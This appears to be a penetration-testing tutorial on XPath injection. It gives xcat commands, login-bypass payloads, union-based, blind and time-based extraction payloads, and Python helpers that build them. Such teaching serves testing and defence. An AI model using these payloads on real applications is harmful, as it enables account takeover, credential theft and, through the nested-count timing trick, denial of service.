XPath Injection
XML Path Language (XPath) is a query language for retrieving data from XML documents, typically used in web applications that store data in an XML format.
When an application inserts user input into XPath queries without proper sanitization, an attacker can exploit the vulnerability to retrieve the entire XML document, gaining access to all data stored in it.
XPath injection is essentially the XML equivalent of SQL injection for databases.
Automatic Injection using XCAT
pip3 install cython
pip3 install xcat
Usage: xcat [OPTIONS] COMMAND [ARGS]...
The commands are:
detect: detect and print the type of injection found
injections: print all types of injection supported by xcat
ip: print the current external IP address
run: retrieve the XML document by exploiting the XPath injection
shell: xcat shell to run system commands
Find more info on commands using:
xcat <command> --help
Detect if a non-blind endpoint is vulnerable to XPath Injection:
xcat detect <url> <vulnerable-param> param1=value1 param2=value2 --true-string='invalid-input-string'
Exfiltrate the XML document (via POST request):
xcat run <url> <vulnerable-param> param1=value1 --true-string=successfully -m POST --encode FORM
XPath Fundamentals
Basic Concepts
XML documents contain data formatted in a tree structure of nodes with the top element being the root element node. Each node aside from the root has exactly one parent node, while each element node may have an arbitrary number of child nodes.
Nodes with the same parent are called sibling nodes. Traversing upwards or downwards from a given node determines all its ancestor nodes or descendant nodes.
An example XML document would be the following:
<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
<book>
<title lang="en">The name of the rose</title>
<author>Umberto Eco</author>
<price currency="dollar">5,00</price>
<category>Novel</category>
</book>
</bookstore>
In the example:
bookstore is the root element node.
title, author, price and category are element nodes.
lang and currency are attribute nodes.
title, author, price and category are siblings, with book being their parent.
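The node relationships above can be checked with a small sketch using Python's standard xml.etree.ElementTree module. The XML declaration is omitted for brevity, and the variable names are illustrative assumptions rather than part of any real application.

```python
import xml.etree.ElementTree as ET

# The example document from above (XML declaration omitted for brevity).
BOOKSTORE_XML = """
<bookstore>
  <book>
    <title lang="en">The name of the rose</title>
    <author>Umberto Eco</author>
    <price currency="dollar">5,00</price>
    <category>Novel</category>
  </book>
</bookstore>
"""

root = ET.fromstring(BOOKSTORE_XML)   # root element node
book = root[0]                        # first (and only) child of the root

sibling_tags = [child.tag for child in book]    # element nodes sharing the parent book
title_attributes = book.find("title").attrib    # attribute nodes of title
price_attributes = book.find("price").attrib    # attribute nodes of price

print(root.tag, sibling_tags, title_attributes, price_attributes)
```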
Selecting Data
Each XPath query selects a set of nodes from the XML document. A query is evaluated from a context node, which marks its starting point. This means that, depending on the context node, the same query may have different results.
There are several ways to select nodes in XPath. Some basic example queries are:
example - Select all example child nodes of the context node
/ - Select the document root node
// - Select descendant nodes of the context node
. - Select the context node
.. - Select the parent node of the context node
@attributeName - Select the attributeName attribute node of the context node
text() - Select all text node child nodes of the context node
query1 | query2 - Combine multiple queries with the union operator
Starting from the previous basic queries, it is possible to construct more complex queries, such as:
/bookstore/book - Select all book child nodes of the bookstore node
/bookstore//title - Select all title nodes that are descendants of the bookstore node
/bookstore/book/price/@currency - Select all currency attribute nodes of all price nodes under book elements that are child nodes of the bookstore node
//book - Select all books
//@currency - Select all currency attribute nodes
Notice:
Any query starting with // is evaluated from the document root and not at the context node.
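As a rough illustration, some of these selections can be tried with Python's standard xml.etree.ElementTree module. Note that it implements only a subset of XPath: paths are relative to the element they are called on, and attribute nodes cannot be returned directly, so the attribute is read from the selected element instead. The shortened sample document is an assumption made for the sketch.

```python
import xml.etree.ElementTree as ET

root = ET.fromstring(
    "<bookstore>"
    "<book><title lang='en'>The name of the rose</title>"
    "<price currency='dollar'>5,00</price></book>"
    "</bookstore>"
)

# root is the bookstore element, so "./book" plays the role of /bookstore/book.
books = root.findall("./book")

# ".//title" plays the role of /bookstore//title.
titles = [title.text for title in root.findall(".//title")]

# Stand-in for /bookstore/book/price/@currency: select the price elements,
# then read the attribute, since ElementTree cannot select attribute nodes.
currencies = [price.get("currency") for price in root.findall("./book/price")]

print(len(books), titles, currencies)
```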
Filtering data via Predicates
Predicates filter the result from an XPath query similar to the WHERE clause in a SQL query.
Predicates are part of the XPath query and are contained within [].
Some examples are:
/bookstore/book[1] - Select the first book from the bookstore node
/bookstore/book[position()<10] - Select the first 9 books
//book/title[@lang]/../category - Select the category of all books whose title has a lang attribute
It is also possible to use wildcards such as:
node() - Matches any node
* - Matches any element node
@* - Matches any attribute node
Notice that the * wildcard matches any element node at a single level of the tree; it does not match descendants at arbitrary depth.
To match descendants you can use //, or alternatives such as /*/*/title to match all titles of all books in the bookstore.
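A minimal sketch of predicates and wildcards, again using the limited XPath subset of Python's standard xml.etree.ElementTree. The second book is made-up sample data added only so that the filters have something to exclude, and functions such as position() are not available in this subset.

```python
import xml.etree.ElementTree as ET

root = ET.fromstring(
    "<bookstore>"
    "<book><title lang='en'>The name of the rose</title><category>Novel</category></book>"
    "<book><title>Untitled draft</title><category>Essay</category></book>"
    "</bookstore>"
)

# Like /bookstore/book[1]: positional predicate, 1-based.
first_book_title = root.findall("./book[1]")[0].find("title").text

# Like //book/title[@lang]/../category: only titles that carry a lang attribute.
categories = [c.text for c in root.findall(".//title[@lang]/../category")]

# Like /*/*/title: the wildcard matches exactly one level per step.
all_titles = [t.text for t in root.findall("./*/title")]

print(first_book_title, categories, all_titles)
```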
Authentication Bypass
An application might implement authentication via XML data containing all users' credentials.
In this case, to perform authentication, the web application might execute an XPath query to check the user data, such as the following:
/users/user[username/text()='<username>' and password/text()='<password>']
In this case, if no checks are performed on user input, authentication can easily be bypassed using a query that always evaluates to true, such as:
username = ' or '1'='1
password = ' or '1'='1
resulting query:
/users/user[username/text()='' or '1'='1' and password/text()='' or '1'='1']
This will allow us to log in as the first user in the XML data.
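The following sketch shows how such a query could end up being built. The function build_login_query is hypothetical: it stands in for vulnerable server-side code that concatenates user input into the XPath expression, and is not taken from any real application.

```python
def build_login_query(username: str, password: str) -> str:
    """Hypothetical vulnerable code: user input is concatenated into the query."""
    return (
        "/users/user[username/text()='" + username + "' "
        "and password/text()='" + password + "']"
    )

payload = "' or '1'='1"

# Both fields carry the payload, so the quotes of the original query are rebalanced.
bypass_query = build_login_query(payload, payload)
print(bypass_query)
```

A real application would avoid this by using parameterized XPath expressions or by strictly validating the input before it reaches the query.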
If known, it is possible to inject a valid username and a true condition for the password, such as
username = administrator
password = ' or '1'='1
resulting query:
/users/user[username/text()='administrator' and password/text()='' or '1'='1']
In more realistic cases, we might not know any valid username. Also, the password is most probably hashed before it is placed in the query, meaning that the password payload is hashed as well and loses its effect. For example:
username = ' or '1'='1
password = ' or '1'='1
resulting query:
/users/user[username/text()='' or '1'='1' and password/text()='<MD5-hash>']
To properly bypass authentication in these cases, we can inject a double or condition to gain a universally true condition, for example:
username = ' or true() or '
password = ' or '1'='1
/users/user[username/text()='' or true() or '' and password/text()='<MD5-hash>']
Explanation - Getting a universally true condition:
In XPath, the and operator has higher precedence than the or operator, so it is evaluated first.
The empty string '' converts to false, and in a realistic case no password equals the MD5 hash of the payload, so the and condition resolves to false.
Because of that, the resulting query becomes:
/users/user[username/text()='' or true() or false()]
Since true() is present, the whole predicate (two or operators) evaluates to true for every <user> node.
This means that the expression will return all /users/user nodes.
The application will then match the first node, meaning you will log in as the first user in the document.
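Python's and/or operators have the same relative precedence as XPath's, so the logic can be mirrored in plain Python as a rough sanity check. This is only an analogy, not an XPath evaluation; the user records and hash values below are made up for illustration.

```python
def naive_predicate(stored_username: str, stored_password: str, md5_hash: str) -> bool:
    # Mirrors: username/text()='' or '1'='1' and password/text()='<MD5-hash>'
    return stored_username == "" or ("1" == "1" and stored_password == md5_hash)

def double_or_predicate(stored_username: str, stored_password: str, md5_hash: str) -> bool:
    # Mirrors: username/text()='' or true() or '' and password/text()='<MD5-hash>'
    # bool("") is False, matching XPath's conversion of the empty string.
    return stored_username == "" or True or (bool("") and stored_password == md5_hash)

# Made-up user records: (username, stored password hash).
users = [("alice", "hash-a"), ("bob", "hash-b")]
payload_hash = "hash-of-injected-password"  # matches no stored hash

naive_matches = [u for u, p in users if naive_predicate(u, p, payload_hash)]
double_or_matches = [u for u, p in users if double_or_predicate(u, p, payload_hash)]
print(naive_matches, double_or_matches)
```

The single or payload matches no user because the and clause swallows the true condition, while the double or payload matches every user.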
Again, this logs us in as the first user in the XML data. To log in as another user without knowing their username, we can use the position() function:
username = ' or position()=2 or '
password = ' or '1'='1
/users/user[username/text()='' or position()=2 or '' and password/text()='<MD5-hash>']
Lastly, we can use the contains() function to find all usernames containing a specific substring.
This allows targeting accounts containing a specific word in their usernames (which we might know).
username = ' or contains(.,'admin') or '
password = ' or '1'='1
/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='<MD5-hash>']
Data Exfiltration
Union Based
We can try to access arbitrary data from XML documents using techniques similar to UNION-based SQL injections. For this example, consider a bookstore web application with a search functionality that uses two GET parameters:
?q=<input> - finds books containing the user's search string.
&f=<input> - selects a property of the book to display (example: title)
By analyzing the web application's behavior, we can deduce the performed XPath query:
/a/b/c[contains(d/text(), 'q')]/f
which, considering an HTTP request such as:
GET /search.php?q=harrypotter&f=title HTTP/1.1
would turn to:
/a/b/c[contains(d/text(), 'harrypotter')]/title
The search string we provide in the GET parameter q is inserted in the predicate that filters the books using the contains function. After that, the GET parameter f determines the property the web application displays from all matching books (title, for example), which is why it is appended at the end of the query.
We can confirm XPath injection by sending the payload a') or ('1'='1 in the q parameter and leaving the f parameter set to title. This would result in the following XPath query:
/a/b/c[contains(d/text(), 'a') or ('1'='1')]/title
Regardless of whether our substring matches anything, the injected or clause evaluates to true, so the predicate becomes universally true. Therefore, it matches all nodes at that depth. With this payload, the web application responds with all book titles, thus confirming the XPath injection vulnerability.
Unlike SQL, XPath does not let you comment out the remainder of an expression, meaning you cannot discard part of an XPath query using characters like -- or # as you would in SQL.
The next step is to construct a query that returns the entire XML document. The simplest way is to append a new query that returns all text nodes:
GET /search.php?q=SOMETHINGINVALID&f=title+|+//text() HTTP/1.1
We could also achieve the same result by using:
q = SOMETHINGINVALID') or ('1'='1
f = ../../..//text()
For the first request, the web application executes the following query:
/a/b/c[contains(d/text(), 'SOMETHINGINVALID')]/title | //text()
We are appending a second query with the | operator, similar to a UNION-based SQL injection.
The second query, //text(), returns all text nodes in the XML document.
Therefore, the response contains all data stored in the XML document.
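When sending these payloads from a script, the parameters need to be URL-encoded. The sketch below builds both request URLs with Python's standard urllib.parse module; the host name target.example is a placeholder assumption, and the script only constructs the URLs without sending anything.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

BASE_URL = "http://target.example/search.php"  # hypothetical target

def build_search_url(q: str, f: str) -> str:
    """URL-encode both GET parameters so quotes, pipes and slashes survive transport."""
    return BASE_URL + "?" + urlencode({"q": q, "f": f})

# Variant 1: append a second query with the union operator.
union_url = build_search_url("SOMETHINGINVALID", "title | //text()")

# Variant 2: make the predicate always true and climb back up from the matched nodes.
traversal_url = build_search_url("SOMETHINGINVALID') or ('1'='1", "../../..//text()")

print(union_url)
print(traversal_url)
```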
Identifying the Schema Depth
It isn't always possible to leverage a query to directly extract all the document's data in one shot: an XPath query may only return a limited number of results, in which case you can only access one piece of information at a time.
To exfiltrate all the document's data in this scenario, we need to learn the schema's structure and depth. We can do so with an iterative process: each time, we inject a payload that makes the original XPath query return no results and append a new query that reveals information about the schema depth.
In particular, we can inject a union query operator followed by a subquery which starts from the document root element node: <XPath Query> | /*[1]
The subquery /*[1] starts at the document root /, moves one node down the node tree due to the wildcard *, and selects the first child due to the predicate [1]. Thus, this subquery selects the document root's first child, the document root element node.
By doing that, the web application will most probably not return data: the web application expects a single return value, but the injected query returns the entire document root element node, which contains multiple child nodes rather than a single value.
We can understand the depth of the XML document by iteratively appending an additional /*[1] to the subquery until the behavior of the web application changes:
<XPath Query> | /*[1]
<XPath Query> | /*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
.....
Once the web application finally returns some data, we can deduce that the schema depth is at least equal to the number of appended /*[1] steps.
This process allows you to understand the depth for the node you are expanding. There might be other deeper nodes, which would increase the document's depth.
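The depth probing loop can be sketched as follows. The function fake_app is a stand-in for sending the injected request and checking whether the response contains data; in a real test it would be replaced by an HTTP request against the target, and the depth of 4 is an arbitrary assumption.

```python
from typing import Callable, Optional

def depth_probe(depth: int) -> str:
    """Build the injected suffix: the union operator followed by depth /*[1] steps."""
    return "| " + "/*[1]" * depth

def find_depth(returns_data: Callable[[str], bool], max_depth: int = 10) -> Optional[int]:
    """Return the first depth at which the application starts returning data."""
    for depth in range(1, max_depth + 1):
        if returns_data(depth_probe(depth)):
            return depth
    return None

def fake_app(suffix: str) -> bool:
    # Stand-in oracle: pretends the first text-bearing node sits four levels deep.
    return suffix.count("/*[1]") >= 4

found_depth = find_depth(fake_app)
print(depth_probe(2), found_depth)
```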
To return all the information in the element nodes, we need to find the element node names by iterating the previous payload and changing the first child to the second, then the third and so on:
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[2]
<XPath Query> | /*[1]/*[1]/*[1]/*[3]
<XPath Query> | /*[1]/*[1]/*[1]/*[4]
.....
Iterating this process for all element nodes gives access to the entire XML document.
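A possible way to generate these subqueries systematically is sketched below. The width parameter is an assumed upper bound on the number of children per node; in practice you would stop increasing an index as soon as the application stops returning data for it.

```python
from itertools import product
from typing import Iterator

def index_paths(depth: int, width: int) -> Iterator[str]:
    """Yield subqueries of the given depth, with the last index varying fastest.

    The first step is always /*[1], because a document has a single root element.
    """
    for indexes in product(range(1, width + 1), repeat=depth - 1):
        yield "/*[1]" + "".join(f"/*[{i}]" for i in indexes)

paths = list(index_paths(depth=3, width=2))
for path in paths:
    print("<XPath Query> | " + path)
```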
Example iteration:
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[2]
.....
<XPath Query> | /*[1]/*[1]/*[2]/*[1]
<XPath Query> | /*[1]/*[1]/*[2]/*[2]
<XPath Query> | /*[1]/*[1]/*[2]/*[3]
.....
<XPath Query> | /*[1]/*[2]/*[1]/*[1]
<XPath Query> | /*[1]/*[2]/*[1]/*[2]
.....
Blind Exfiltration
Similarly to blind SQL injection, the web application may not display the query results to us, but it may still be possible to exfiltrate data. Unlike SQL, XPath has no sleep function, so we need other indicators that tell us whether the injected condition evaluated to true.
While there is no sleep function in XPath, it is still possible to perform time-based exploitation, as shown in the Time-Based Exploitation section.
The idea behind blind exfiltration is to enumerate the names of element nodes, so that we can construct XPath queries without wildcards that target interesting data points.
There are 4 functions that can help with this process:
name(): determine a node's name
substring(): exfiltrate a node name one character at a time
string-length(): determine the length of a node name to know when to stop the exfiltration
count(): return the number of nodes in a node-set, for example the children of an element node
Consider an example web application that allows users to chat. The web application starts a chat with a user via the page chat.php?username=sfoffo.
If a chat is started with an invalid username, the web application prints an error message. If the username is valid, the chat page is opened. This difference in responses is what we rely on to perform the blind exfiltration.
Since the application performs a user existence check, we can guess the underlying XPath query is similar to the following: /users/user[username='input']. To confirm, we can use a payload such as invalid' or '1'='1 to obtain the query: /users/user[username='invalid' or '1'='1'].
The application will then act like a valid username was found, since the check returns true.
1. Exfiltrating the Length of a Node Name
To exfiltrate the length of the root element node's name, we can use the following payload:
Payload:
invalid' or string-length(name(/*[1]))=1 and '1'='1
Full Query:
/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']
This query returns data only if string-length(name(/*[1]))=1 is true, meaning the length of the root element node's name is 1. Repeat the query with increasing lengths until the application's response matches the response for a valid username.
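The length search can be automated along these lines. The oracle function here is only a stand-in that inspects the payload and answers against a known value; in a real test it would send the payload in the username parameter and return True when the chat page opens. The secret name and the maximum length are assumptions made for the sketch.

```python
import re
from typing import Optional

SECRET_ROOT_NAME = "users"  # stand-in for the unknown root element name

def length_payload(n: int) -> str:
    """Build the payload that is true only when the root element name has n characters."""
    return f"invalid' or string-length(name(/*[1]))={n} and '1'='1"

def oracle(payload: str) -> bool:
    """Stand-in for the HTTP request; True means the 'valid username' response."""
    match = re.search(r"string-length\(name\(/\*\[1\]\)\)=(\d+)", payload)
    return match is not None and int(match.group(1)) == len(SECRET_ROOT_NAME)

def find_length(max_length: int = 64) -> Optional[int]:
    """Try increasing lengths until the oracle reports a match."""
    for n in range(1, max_length + 1):
        if oracle(length_payload(n)):
            return n
    return None

root_name_length = find_length()
print(root_name_length)
```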
2. Exfiltrating a Node Name
Now that we know the length of the node's name, we can exfiltrate the name character by character.
To do that, we can use the substring() function:
Payload:
invalid' or substring(name(/*[1]),1,1)='a' and '1'='1
Full Query:
/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']
The query returns data only if the first character of the root element node's name equals a. Repeat the query for each candidate character until the web application responds as it does for a valid username.
Finally, the payload needs to be iterated for the next character positions to find the entire node name:
invalid' or substring(name(/*[1]),2,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),3,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),4,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),5,1)='<letter>' and '1'='1
3. Exfiltrating the Number of Child Nodes
To determine the number of child nodes for a given node, we can use the count() function in a payload:
Payload:
invalid' or count(/users/*)=1 and '1'='1
Full Query:
/users/user[username='invalid' or count(/users/*)=1 and '1'='1']
This query returns data only if the guessed number of child nodes is correct, so repeat it with increasing values until the response matches the one for a valid username.
After exfiltrating the number of child nodes, you can repeat the entire process to find the entire document's structure.
4. Exfiltrating Data
After you have identified the XML document structure, you can proceed with data exfiltration using the same ideas already mentioned.
The first step is to find the number of characters in the first username:
Payload:
invalid' or string-length(/users/user[1]/username)=1 and '1'='1
Full Query:
/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']
Then, find each character of the username, up to the length just determined:
Payload:
invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1
Full Query:
/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']
Finally, iterate through all character positions until the entire username is exfiltrated.
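A minimal sketch of the character-by-character loop follows. As before, oracle is a stand-in that answers against a known value instead of sending requests, and the secret username and the candidate alphabet are assumptions. The alphabet deliberately excludes quote characters, which would break the payload syntax.

```python
import re
import string

SECRET_USERNAME = "admin"           # stand-in for the value stored in the document
TARGET = "/users/user[1]/username"  # node whose string value is being extracted

def char_payload(position: int, char: str) -> str:
    """Build the payload that is true only if the character at position equals char."""
    return f"invalid' or substring({TARGET},{position},1)='{char}' and '1'='1"

def oracle(payload: str) -> bool:
    """Stand-in for the HTTP request; True means the 'valid username' response."""
    match = re.search(r",(\d+),1\)='(.)'", payload)
    if match is None:
        return False
    position, char = int(match.group(1)), match.group(2)
    return SECRET_USERNAME[position - 1:position] == char

def extract(length: int, alphabet: str = string.ascii_lowercase + string.digits) -> str:
    recovered = ""
    for position in range(1, length + 1):  # XPath string positions are 1-based
        for char in alphabet:
            if oracle(char_payload(position, char)):
                recovered += char
                break
        else:
            recovered += "?"  # no candidate in the alphabet matched this position
    return recovered

username = extract(length=5)
print(username)
```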
Time-Based Exploitation
In fully blind scenarios (where the response is the same whether the input is valid or not), it is possible to abuse the processing time of the web application to create behavior similar to a sleep function.
In particular, you can call the count function with stacked predicates to force the web application to iterate over all nodes in the XML document many times over, which takes a noticeable amount of time on large documents.
Consider a payload such as the following:
Payload:
invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1
Full Query:
/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1']
If the condition substring(/users/user[1]/username,1,1)='a' is true, the second part of the and clause is evaluated, and the nested count iterates over the XML document repeatedly, causing a large time delay. If the condition is false, the nested count is never evaluated and the response arrives quickly, meaning that the first character of the username is not a.
Using this idea, we can exfiltrate all the XML document's data.
If the XML document is large, this payload can quickly result in a Denial-of-Service. Be careful!
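The timing decision can be sketched as follows. The function fake_send simulates a slow response with time.sleep instead of contacting a server, and the 0.1 second threshold is an arbitrary assumption that would need calibrating against the real target's normal response time.

```python
import time
from typing import Callable

DELAY_THRESHOLD = 0.1  # seconds; assumed cut-off, calibrate against the real target

def timed_payload(position: int, char: str) -> str:
    """Build the payload whose expensive nested count runs only if the guess is right."""
    return (
        f"invalid' or substring(/users/user[1]/username,{position},1)='{char}' "
        "and count((//.)[count((//.))]) and '1'='1"
    )

def fake_send(payload: str) -> None:
    """Stand-in for the HTTP request: slow only when the guessed character is 'a'."""
    if "='a' and count(" in payload:
        time.sleep(0.3)

def condition_is_true(payload: str, send: Callable[[str], None] = fake_send) -> bool:
    """Infer the truth of the injected condition from the elapsed time."""
    start = time.perf_counter()
    send(payload)
    return time.perf_counter() - start > DELAY_THRESHOLD

print(condition_is_true(timed_payload(1, "a")), condition_is_true(timed_payload(1, "b")))
```

Against a real target, network jitter makes a single measurement unreliable, so repeating each request and comparing averages is usually a safer design.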